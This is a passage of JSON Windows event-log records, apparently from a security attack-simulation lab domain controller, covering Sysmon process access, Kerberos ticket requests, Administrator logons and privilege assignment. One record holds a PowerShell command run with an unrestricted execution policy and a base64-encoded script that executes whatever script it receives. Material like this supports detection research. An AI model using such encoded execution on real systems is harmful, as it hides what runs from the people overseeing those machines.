C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.712","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5352,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220545,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220546,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220547,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220548,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7D743\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7d743","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220549,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7D743\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7d743","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5353,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.781\r\nProcessGuid: {E2A3D6B1-11D2-5F25-0000-001053D70700}\r\nProcessId: 4720\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.781","ProcessGuid":"{E2A3D6B1-11D2-5F25-0000-001053D70700}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5354,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001053D70700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ecb198db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfba9b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfba686|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+eca6ba9b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebf7b21c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfd96eb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbcd50|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbcd50|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbcbe1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfaeb66|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbb099|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfbac8c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfba9b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ebfba686|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0e